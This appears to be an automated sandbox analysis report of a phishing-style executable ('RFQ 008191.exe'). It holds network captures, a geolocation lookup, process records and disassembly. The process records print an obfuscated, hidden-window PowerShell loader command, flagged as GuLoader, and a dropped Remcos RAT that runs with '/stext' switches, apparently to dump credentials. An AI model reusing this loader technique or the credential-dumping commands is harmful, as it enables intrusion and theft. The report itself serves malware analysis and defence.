                                                                  Data Raw: 11 88 57 36 80 d4 0d 32 96 cb f6 f0 b5 2d 73 e3 7e 14 a8 21 e4 c2 1f 3d ad 7b 12 a0 2d 91 c5 1f e9 b6 34 38 94 7b 0f 43 87 13 a1 a2 f3 d7 20 28 3b 15 d9 3b 60 73 0c bf 79 b1 35 a5 22 25 c3 0b 7e b0 a0 04 af b7 ae 6c d6 e5 a7 2d ae c6 1f 8e 9b da 1c a0 72 cc 78 e6 c5 7b ec 0b 43 19 b6 b4 77 50 f5 f2 b1 7f b9 4e a8 73 82 d3 57 97 08 a1 6a 35 49 a9 86 6f d1 35 27 93 31 0a 69 e1 88 b7 17 5e e8 89 38 2d 6b 98 bc e4 49 1b 33 5c d5 3d cf 24 57 0e 2b 43 d0 7d 39 44 11 07 1e ca 25 4d 59 50 b6 23 3b 9d 7f b2 4c 0b 97 30 16 92 5f 43 fb ea a6 56 a2 f0 a0 81 a1 c6 17 02 a7 c9 6e 44 55 40 95 c7 85 09 d6 d4 e8 71 48 ce b3 2a b3 e8 ee 1c d6 f0 31 69 78 0e 22 51 d0 a5 5e 0c da 4b dd 96 f4 9e 15 64 92 8b 58 ed 24 56 d3 d0 62 e4 5b f7 4f 42 8d d9 38 f3 cf aa 37 b8 b2 0e 5b a8 ac 5c fe 9c 16 38 df 49 41 68 8e 12 37 bf e7 6b 97 b5 ff c9 36 c4 dc 24 b0 d6 b4 14 28 0a 53 40 aa 55 24 db f9 f2 f2 a8 5d 38 43 d3 b2 45 b6 95 c7 b6 91 31 c7 25 55 80 23 45 ab ae a5 8c 9e 40 c9 cd aa 20 fc e5 aa dd 6f bd 4d ff 96 ee d2 cd c9 14 [TRUNCATED]
                                                                  Data Ascii: W62-s~!={-48{C (;;`sy5"%~l-rx{CwPNsWj5Io5'1i^8-kI3\=$W+C}9D%MYP#;L0_CVnDU@qH*1ix"Q^KdX$Vb[OB87[\8IAh7k6$(S@U$]8CE1%U#E@ oM ]m6rzuL4}n4q3VZ!+d*.rc{*_tZ|EEEvfO'm-ev35<:=nayC=~q{S@kZ7V/2g]-8HL[v%B_}j7,+"{B(w#0I!F$qH^Cpj{rb3/x4uONY;z#vXTHw8_S!gmxl%B#~xP=s/fZ"Mh?xba^1KnVOH& U \RX[?RHI- M:vO{hQrbX`CNM=OSgv#ouUCp;R|@F)E{pc<)gwieF:@H@,d"E`bkH\U-[ba0^ctZ4ytJR2pkM<yW\<^+|B*37<#Er|`c)O3,N8?
                                                                  Dec 10, 2024 16:28:58.760165930 CET1236INData Raw: c4 f2 ea 3f 2d ee 26 bc f1 8d f6 d0 65 67 d9 d2 d0 3f 78 e4 77 c3 63 6e 0d 43 d2 45 20 d3 93 fe 79 aa bb 10 5f 48 d1 4c ef 96 b6 eb f5 62 6f 47 59 3c 71 dd 5d f4 11 51 81 b1 1b 0c ae 2d 40 11 8a 45 3d cb 98 1b 7e 12 77 e2 90 86 31 af ed 34 bf 8e
                                                                  Data Ascii: ?-&eg?xwcnCE y_HLboGY<q]Q-@E=~w14yh gD+iU7u-^K@<c\.cg9'$nJ;1.aYdlzP&x&q(oeqx^_.1cASMso4
                                                                  Dec 10, 2024 16:28:58.760178089 CET1236INData Raw: e1 14 63 02 3f c1 c7 2c 26 c8 f4 f8 72 af 31 91 f2 00 13 87 28 19 6c 25 17 57 b5 9f b2 77 15 a6 b0 df f7 ef 5b 85 40 bc 4f d5 9b a1 76 80 53 58 c3 a4 8f 01 98 85 a1 06 92 2d c6 48 80 14 90 76 73 00 1e e6 b4 4d c8 3b e4 4b 4a db 25 f4 cb 2e 73 d7
                                                                  Data Ascii: c?,&r1(l%Ww[@OvSX-HvsM;KJ%.svQ1@%Ss!Jc4S*=w0CgL1Rc9@DsEpr|[pDw0TRAcKDkdmE9'`'Kd+arbu^;y4|.!V)
                                                                  Dec 10, 2024 16:28:58.760736942 CET1236INData Raw: 22 29 3f f6 2f 8c 40 c6 32 e2 8c 89 35 c3 36 fc 7f 97 05 be a7 f1 a9 d1 05 b7 c2 aa fe 06 a3 b6 bf 7c 39 3a 8d b9 c2 27 24 79 7d 77 21 f2 f4 b6 5d a0 61 ec bd 1f 7d 8c b6 1d fc 05 69 6d 61 29 77 2d 76 fd 1a 1e 6b 1c 08 d7 8d 7d 98 ef fc eb 7e ef
                                                                  Data Ascii: ")?/@256|9:'$y}w!]a}ima)w-vk}~Ed.|t[:[{KbNSF~2r{SZ[$S-8SHC{y)^A5J#)s@&8<B93;=!"qn$$1'UZi8Qx
                                                                  Dec 10, 2024 16:28:58.760750055 CET896INData Raw: 66 84 4f 65 0d b4 6f 01 e5 e3 ab 78 1a 37 34 de b7 b0 d4 27 67 37 37 83 94 42 7d eb 46 1e 93 a7 6e 51 1f 3d d6 d7 ce fd 02 7a 07 ac b7 25 aa 8c 2c 65 29 51 6f 94 7f cb 48 1e a0 72 47 b6 0e 8b 78 ec 0b c8 df e8 77 21 db 04 1a 3a 7b b9 4e 23 27 a6
                                                                  Data Ascii: fOeox74'g77B}FnQ=z%,e)QoHrGxw!:{N#'Y3q=A6l5~EgK~8<\}n|Y,}@wL -p_4:`V53?Mfa"c{4,9,!KID7m~,*DA@Y!jCB!
                                                                  Dec 10, 2024 16:28:58.789952040 CET1236INData Raw: 23 9a b2 64 c0 49 af fa 91 74 49 a3 c3 07 7b 62 b2 28 c6 f2 cd fd 1c 23 1c 22 c8 66 9f db e4 b1 6b 69 3f 63 02 ba 51 ec 96 26 04 bc 94 fb 51 3f 42 40 63 63 75 e8 c8 ab 68 f0 b0 d9 b8 2c c4 48 c7 0c 5a 05 f7 e4 46 a8 d0 c4 71 8c 2f 2d 63 63 43 a1
                                                                  Data Ascii: #dItI{b(#"fki?cQ&Q?B@ccuh,HZFq/-ccC1qh=w+Z=,!WA/3'GlMudQ+nQ4q9@Ag[CBt:X%; tjf8<86bR:R.~`j{}1W/w;5
                                                                  Dec 10, 2024 16:28:58.790045023 CET1236INData Raw: d2 31 73 d6 f2 fe 4b 52 e3 88 d4 0f 49 9f dd b4 ce 65 8e 02 13 59 2b 28 ae af 6c 98 73 de 98 94 38 94 a8 d8 f4 12 ae ac e5 d2 96 77 f1 78 50 92 64 0d 92 49 d9 88 c6 57 d9 68 7e b6 81 0b a8 26 70 5f ef 7f d9 36 07 05 9f a5 69 a8 70 6f 87 4b 40 69
                                                                  Data Ascii: 1sKRIeY+(ls8wxPdIWh~&p_6ipoK@i 9^hfV_l%/?.xM1z*KR:boLT+C<F>Ki5Lr-oCsr#6rLQ3uqC~Lg!F>uJKl/o|1@
                                                                  Dec 10, 2024 16:28:58.790059090 CET1236INData Raw: 1a bb 73 71 f7 24 61 18 c7 cd 31 a2 3c 8a 22 1c 59 c8 45 d4 06 1e 4e 8d 45 f2 f2 90 e9 90 b3 5a 4c 32 49 94 37 21 7a 20 7a e7 3b b8 3c 8d e9 8a a9 ff 0e 8a 8e 68 10 0f 06 25 10 5a 89 86 a5 8d 8f 1b c7 7d df a2 ef 3d 17 a2 56 58 1e b9 74 42 b4 b7
                                                                  Data Ascii: sq$a1<"YENEZL2I7!z z;<h%Z}=VXtB"0,h0Z9!:]]:\^gDT"M%km-U;=,%4*VPl'S1=n)W"$4OC2s%O,J4
                                                                  Dec 10, 2024 16:28:58.790497065 CET1236INData Raw: e0 f3 97 94 f9 ef fc 85 94 fa 2d ce 4a d1 bc e3 16 27 e2 f6 53 b8 df 64 86 e3 fd 38 17 14 1b 8b 33 01 08 bf 23 bc 66 4a 09 de 39 78 f4 15 26 87 46 8d f4 9a 48 93 bd 76 2b 83 86 44 8d 9d e2 61 32 43 18 32 2b 21 32 a6 d8 11 07 1a d4 b5 9e 9c 89 4d
                                                                  Data Ascii: -J'Sd83#fJ9x&FHv+Da2C2+!2MxB@C>RG4oFF$X'$3/oHIS`~?KsQ9Ib9`aN#qf "*i1P<_\={~++.2?;R_6l*cRB
                                                                  Dec 10, 2024 16:28:58.790509939 CET1236INData Raw: 51 c1 32 ba 71 85 b2 11 96 21 12 e5 08 b8 a5 05 f6 0e af 6c 2f b3 c2 b8 9d ca 01 9b 08 a0 c8 20 ee 3b 9d fa aa b2 64 7b a2 80 b5 9e 71 56 6d e3 63 1a 4b d6 da ec 03 d9 7e 6c ac 60 0b 35 8a 56 9d 82 fe e3 85 22 62 6e e4 48 0a 76 4d cb 9e 28 c5 e9
                                                                  Data Ascii: Q2q!l/ ;d{qVmcK~l`5V"bnHvM(2pk<-zTUc>=&$q&C&&"/3YQ}}5IK;0XsSr9/h>lpJ_e%;q5pB;(z
                                                                  Dec 10, 2024 16:28:58.880290031 CET1236INData Raw: 62 7a 35 6e 09 c2 0f ed 5d de d9 37 93 e3 1c e6 5b ed ee 0b 24 9e 5d bb 90 8b a9 bf 41 cb 8d e5 ce da 74 09 f2 df aa 9a 4a 83 d7 bc 52 97 86 cb c6 41 1b 3d f6 79 bf 3c 8c 7b a5 f8 d8 49 25 7f 34 5b 55 bd d8 a1 d4 da bc 9e 67 12 90 3e 17 61 32 ab
                                                                  Data Ascii: bz5n]7[$]AtJRA=y<{I%4[Ug>a2$7j;t{r,QBWe%cI=]>d8}\1eg]r'{ ;U0i$o!uWQiq}4x3m4^6W noSBt`;([ku


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.749801178.237.33.50807864C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 10, 2024 16:29:03.413048029 CET71OUTGET /json.gp HTTP/1.1
                                                                  Host: geoplugin.net
                                                                  Cache-Control: no-cache
                                                                  Dec 10, 2024 16:29:04.654165030 CET1190INHTTP/1.1 200 OK
                                                                  date: Tue, 10 Dec 2024 15:29:04 GMT
                                                                  server: Apache
                                                                  content-length: 963
                                                                  content-type: application/json; charset=utf-8
                                                                  cache-control: public, max-age=300
                                                                  access-control-allow-origin: *
                                                                  connection: close
                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                  Data Ascii: { "geoplugin_request":"8.46.123.175", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:10:28:04
                                                                  Start date:10/12/2024
                                                                  Path:C:\Users\user\Desktop\RFQ 008191.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\RFQ 008191.exe"
                                                                  Imagebase:0x400000
                                                                  File size:795'710 bytes
                                                                  MD5 hash:82BA32E4800897E8BAFB32990D29F60A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:10:28:05
                                                                  Start date:10/12/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell.exe -windowstyle hidden "$Prmierer=gc -raw 'C:\Users\user~1\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\svuppende\Beruse.Rob';$eftersgningers=$Prmierer.SubString(48853,3);.$eftersgningers($Prmierer)
                                                                  Imagebase:0x7d0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.1771671696.0000000009BD8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:10:28:05
                                                                  Start date:10/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7b4ee0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:11
                                                                  Start time:11:45:06
                                                                  Start date:10/12/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Juryen.exe"
                                                                  Imagebase:0x400000
                                                                  File size:795'710 bytes
                                                                  MD5 hash:82BA32E4800897E8BAFB32990D29F60A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 18%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:13
                                                                  Start time:11:45:18
                                                                  Start date:10/12/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\dcokdpgzihxxnj"
                                                                  Imagebase:0x400000
                                                                  File size:795'710 bytes
                                                                  MD5 hash:82BA32E4800897E8BAFB32990D29F60A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:11:45:18
                                                                  Start date:10/12/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\owccehyavpqcxpshx"
                                                                  Imagebase:0x400000
                                                                  File size:795'710 bytes
                                                                  MD5 hash:82BA32E4800897E8BAFB32990D29F60A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:11:45:18
                                                                  Start date:10/12/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\Juryen.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user~1\AppData\Local\Temp\Juryen.exe /stext "C:\Users\user\AppData\Local\Temp\yyhnfajurxihaeglgsaa"
                                                                  Imagebase:0x400000
                                                                  File size:795'710 bytes
                                                                  MD5 hash:82BA32E4800897E8BAFB32990D29F60A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:19%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:17%
                                                                    Total number of Nodes:1371
                                                                    Total number of Limit Nodes:24
                                                                    execution_graph 3236 401bc0 3237 401c11 3236->3237 3243 401bcd 3236->3243 3239 401c16 3237->3239 3240 401c3b GlobalAlloc 3237->3240 3238 4023af 3242 40657e 21 API calls 3238->3242 3250 401c56 3239->3250 3274 406541 lstrcpynW 3239->3274 3255 40657e 3240->3255 3245 4023bc 3242->3245 3243->3238 3246 401be4 3243->3246 3275 405ba1 3245->3275 3272 406541 lstrcpynW 3246->3272 3247 401c28 GlobalFree 3247->3250 3251 401bf3 3273 406541 lstrcpynW 3251->3273 3253 401c02 3279 406541 lstrcpynW 3253->3279 3270 406589 3255->3270 3256 4067d0 3257 4067e9 3256->3257 3302 406541 lstrcpynW 3256->3302 3257->3250 3259 4067a1 lstrlenW 3259->3270 3263 40669a GetSystemDirectoryW 3263->3270 3264 40657e 15 API calls 3264->3259 3265 4066b0 GetWindowsDirectoryW 3265->3270 3266 406742 lstrcatW 3266->3270 3268 40657e 15 API calls 3268->3270 3270->3256 3270->3259 3270->3263 3270->3264 3270->3265 3270->3266 3270->3268 3271 406712 SHGetPathFromIDListW CoTaskMemFree 3270->3271 3280 40640f 3270->3280 3285 406935 GetModuleHandleA 3270->3285 3291 4067ef 3270->3291 3300 406488 wsprintfW 3270->3300 3301 406541 lstrcpynW 3270->3301 3271->3270 3272->3251 3273->3253 3274->3247 3276 405bb6 3275->3276 3277 405c02 3276->3277 3278 405bca MessageBoxIndirectW 3276->3278 3277->3250 3278->3277 3279->3250 3303 4063ae 3280->3303 3283 406443 RegQueryValueExW RegCloseKey 3284 406473 3283->3284 3284->3270 3286 406951 3285->3286 3287 40695b GetProcAddress 3285->3287 3307 4068c5 GetSystemDirectoryW 3286->3307 3289 40696a 3287->3289 3289->3270 3290 406957 3290->3287 3290->3289 3292 4067fc 3291->3292 3294 406865 CharNextW 3292->3294 3295 406872 3292->3295 3298 406851 CharNextW 3292->3298 3299 406860 CharNextW 3292->3299 3310 405e3d 3292->3310 3293 406877 CharPrevW 3293->3295 3294->3292 3294->3295 3295->3293 3296 406898 3295->3296 3296->3270 3298->3292 3299->3294 3300->3270 3301->3270 3302->3257 3304 4063bd 3303->3304 3305 4063c6 RegOpenKeyExW 3304->3305 3306 4063c1 3304->3306 3305->3306 3306->3283 3306->3284 3308 4068e7 wsprintfW LoadLibraryExW 3307->3308 3308->3290 3311 405e43 3310->3311 3312 405e59 3311->3312 3313 405e4a CharNextW 3311->3313 3312->3292 3313->3311 3314 403fc1 3315 403fd9 3314->3315 3316 40413a 3314->3316 3315->3316 3317 403fe5 3315->3317 3318 40418b 3316->3318 3319 40414b GetDlgItem GetDlgItem 3316->3319 3320 403ff0 SetWindowPos 3317->3320 3321 404003 3317->3321 3323 4041e5 3318->3323 3334 401389 2 API calls 3318->3334 3322 4044c0 22 API calls 3319->3322 3320->3321 3325 40400c ShowWindow 3321->3325 3326 40404e 3321->3326 3327 404175 SetClassLongW 3322->3327 3328 404135 3323->3328 3387 40450c 3323->3387 3329 404127 3325->3329 3330 40402c GetWindowLongW 3325->3330 3331 404056 DestroyWindow 3326->3331 3332 40406d 3326->3332 3333 40140b 2 API calls 3327->3333 3409 404527 3329->3409 3330->3329 3336 404045 ShowWindow 3330->3336 3386 404449 3331->3386 3337 404072 SetWindowLongW 3332->3337 3338 404083 3332->3338 3333->3318 3339 4041bd 3334->3339 3336->3326 3337->3328 3338->3329 3342 40408f GetDlgItem 3338->3342 3339->3323 3343 4041c1 SendMessageW 3339->3343 3340 40140b 2 API calls 3356 4041f7 3340->3356 3341 40444b DestroyWindow EndDialog 3341->3386 3345 4040a0 SendMessageW IsWindowEnabled 3342->3345 3346 4040bd 3342->3346 3343->3328 3344 40447a ShowWindow 3344->3328 3345->3328 3345->3346 3348 4040ca 3346->3348 3349 404111 SendMessageW 3346->3349 3350 4040dd 3346->3350 3359 4040c2 3346->3359 3347 40657e 21 API calls 3347->3356 3348->3349 3348->3359 3349->3329 3353 4040e5 3350->3353 3354 4040fa 3350->3354 3352 4044c0 22 API calls 3352->3356 3403 40140b 3353->3403 3358 40140b 2 API calls 3354->3358 3355 4040f8 3355->3329 3356->3328 3356->3340 3356->3341 3356->3347 3356->3352 3377 40438b DestroyWindow 3356->3377 3390 4044c0 3356->3390 3360 404101 3358->3360 3406 404499 3359->3406 3360->3329 3360->3359 3362 404272 GetDlgItem 3363 404287 3362->3363 3364 40428f ShowWindow KiUserCallbackDispatcher 3362->3364 3363->3364 3393 4044e2 KiUserCallbackDispatcher 3364->3393 3366 4042b9 EnableWindow 3371 4042cd 3366->3371 3367 4042d2 GetSystemMenu EnableMenuItem SendMessageW 3368 404302 SendMessageW 3367->3368 3367->3371 3368->3371 3371->3367 3394 4044f5 SendMessageW 3371->3394 3395 403fa2 3371->3395 3398 406541 lstrcpynW 3371->3398 3373 404331 lstrlenW 3374 40657e 21 API calls 3373->3374 3375 404347 SetWindowTextW 3374->3375 3399 401389 3375->3399 3378 4043a5 CreateDialogParamW 3377->3378 3377->3386 3379 4043d8 3378->3379 3378->3386 3380 4044c0 22 API calls 3379->3380 3381 4043e3 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3380->3381 3382 401389 2 API calls 3381->3382 3383 404429 3382->3383 3383->3328 3384 404431 ShowWindow 3383->3384 3385 40450c SendMessageW 3384->3385 3385->3386 3386->3328 3386->3344 3388 404524 3387->3388 3389 404515 SendMessageW 3387->3389 3388->3356 3389->3388 3391 40657e 21 API calls 3390->3391 3392 4044cb SetDlgItemTextW 3391->3392 3392->3362 3393->3366 3394->3371 3396 40657e 21 API calls 3395->3396 3397 403fb0 SetWindowTextW 3396->3397 3397->3371 3398->3373 3401 401390 3399->3401 3400 4013fe 3400->3356 3401->3400 3402 4013cb MulDiv SendMessageW 3401->3402 3402->3401 3404 401389 2 API calls 3403->3404 3405 401420 3404->3405 3405->3359 3407 4044a0 3406->3407 3408 4044a6 SendMessageW 3406->3408 3407->3408 3408->3355 3410 4045ea 3409->3410 3411 40453f GetWindowLongW 3409->3411 3410->3328 3411->3410 3412 404554 3411->3412 3412->3410 3413 404581 GetSysColor 3412->3413 3414 404584 3412->3414 3413->3414 3415 404594 SetBkMode 3414->3415 3416 40458a SetTextColor 3414->3416 3417 4045b2 3415->3417 3418 4045ac GetSysColor 3415->3418 3416->3415 3419 4045c3 3417->3419 3420 4045b9 SetBkColor 3417->3420 3418->3417 3419->3410 3421 4045d6 DeleteObject 3419->3421 3422 4045dd CreateBrushIndirect 3419->3422 3420->3419 3421->3422 3422->3410 4027 402641 4028 402dcb 21 API calls 4027->4028 4029 402648 4028->4029 4032 406031 GetFileAttributesW CreateFileW 4029->4032 4031 402654 4032->4031 4040 4025c3 4050 402e0b 4040->4050 4043 402da9 21 API calls 4044 4025d6 4043->4044 4045 4025f2 RegEnumKeyW 4044->4045 4046 4025fe RegEnumValueW 4044->4046 4048 402953 4044->4048 4047 402613 RegCloseKey 4045->4047 4046->4047 4047->4048 4051 402dcb 21 API calls 4050->4051 4052 402e22 4051->4052 4053 4063ae RegOpenKeyExW 4052->4053 4054 4025cd 4053->4054 4054->4043 3631 4015c8 3632 402dcb 21 API calls 3631->3632 3633 4015cf SetFileAttributesW 3632->3633 3634 4015e1 3633->3634 3640 401fc9 3641 402dcb 21 API calls 3640->3641 3642 401fcf 3641->3642 3643 4055c6 28 API calls 3642->3643 3644 401fd9 3643->3644 3655 405b24 CreateProcessW 3644->3655 3647 402002 CloseHandle 3651 402953 3647->3651 3650 401ff4 3652 402004 3650->3652 3653 401ff9 3650->3653 3652->3647 3663 406488 wsprintfW 3653->3663 3656 401fdf 3655->3656 3657 405b57 CloseHandle 3655->3657 3656->3647 3656->3651 3658 4069e0 WaitForSingleObject 3656->3658 3657->3656 3659 4069fa 3658->3659 3660 406a0c GetExitCodeProcess 3659->3660 3664 406971 3659->3664 3660->3650 3663->3647 3665 40698e PeekMessageW 3664->3665 3666 406984 DispatchMessageW 3665->3666 3667 40699e WaitForSingleObject 3665->3667 3666->3665 3667->3659 4058 40204f 4059 402dcb 21 API calls 4058->4059 4060 402056 4059->4060 4061 406935 5 API calls 4060->4061 4062 402065 4061->4062 4063 402081 GlobalAlloc 4062->4063 4064 4020f1 4062->4064 4063->4064 4065 402095 4063->4065 4066 406935 5 API calls 4065->4066 4067 40209c 4066->4067 4068 406935 5 API calls 4067->4068 4069 4020a6 4068->4069 4069->4064 4073 406488 wsprintfW 4069->4073 4071 4020df 4074 406488 wsprintfW 4071->4074 4073->4071 4074->4064 4075 40254f 4076 402e0b 21 API calls 4075->4076 4077 402559 4076->4077 4078 402dcb 21 API calls 4077->4078 4079 402562 4078->4079 4080 40256d RegQueryValueExW 4079->4080 4085 402953 4079->4085 4081 402593 RegCloseKey 4080->4081 4082 40258d 4080->4082 4081->4085 4082->4081 4086 406488 wsprintfW 4082->4086 4086->4081 4087 4021cf 4088 402dcb 21 API calls 4087->4088 4089 4021d6 4088->4089 4090 402dcb 21 API calls 4089->4090 4091 4021e0 4090->4091 4092 402dcb 21 API calls 4091->4092 4093 4021ea 4092->4093 4094 402dcb 21 API calls 4093->4094 4095 4021f4 4094->4095 4096 402dcb 21 API calls 4095->4096 4097 4021fe 4096->4097 4098 40223d CoCreateInstance 4097->4098 4099 402dcb 21 API calls 4097->4099 4102 40225c 4098->4102 4099->4098 4100 401423 28 API calls 4101 40231b 4100->4101 4102->4100 4102->4101 4103 403bd1 4104 403bdc 4103->4104 4105 403be3 GlobalAlloc 4104->4105 4106 403be0 4104->4106 4105->4106 4114 401a55 4115 402dcb 21 API calls 4114->4115 4116 401a5e ExpandEnvironmentStringsW 4115->4116 4117 401a72 4116->4117 4118 401a85 4116->4118 4117->4118 4119 401a77 lstrcmpW 4117->4119 4119->4118 4120 4014d7 4121 402da9 21 API calls 4120->4121 4122 4014dd Sleep 4121->4122 4124 402c4f 4122->4124 4130 4023d7 4131 4023df 4130->4131 4134 4023e5 4130->4134 4132 402dcb 21 API calls 4131->4132 4132->4134 4133 4023f3 4136 402401 4133->4136 4137 402dcb 21 API calls 4133->4137 4134->4133 4135 402dcb 21 API calls 4134->4135 4135->4133 4138 402dcb 21 API calls 4136->4138 4137->4136 4139 40240a WritePrivateProfileStringW 4138->4139 4140 402459 4141 402461 4140->4141 4142 40248c 4140->4142 4143 402e0b 21 API calls 4141->4143 4144 402dcb 21 API calls 4142->4144 4145 402468 4143->4145 4146 402493 4144->4146 4148 402dcb 21 API calls 4145->4148 4150 4024a0 4145->4150 4151 402e89 4146->4151 4149 402479 RegDeleteValueW RegCloseKey 4148->4149 4149->4150 4152 402e9d 4151->4152 4153 402e96 4151->4153 4152->4153 4155 402ece 4152->4155 4153->4150 4156 4063ae RegOpenKeyExW 4155->4156 4158 402efc 4156->4158 4157 402fa6 4157->4153 4158->4157 4159 402f0c RegEnumValueW 4158->4159 4163 402f2f 4158->4163 4160 402f96 RegCloseKey 4159->4160 4159->4163 4160->4157 4161 402f6b RegEnumKeyW 4162 402f74 RegCloseKey 4161->4162 4161->4163 4164 406935 5 API calls 4162->4164 4163->4160 4163->4161 4163->4162 4165 402ece 6 API calls 4163->4165 4166 402f84 4164->4166 4165->4163 4166->4157 4167 402f88 RegDeleteKeyW 4166->4167 4167->4157 4168 40175a 4169 402dcb 21 API calls 4168->4169 4170 401761 SearchPathW 4169->4170 4171 40177c 4170->4171 4172 401d5d 4173 402da9 21 API calls 4172->4173 4174 401d64 4173->4174 4175 402da9 21 API calls 4174->4175 4176 401d70 GetDlgItem 4175->4176 4177 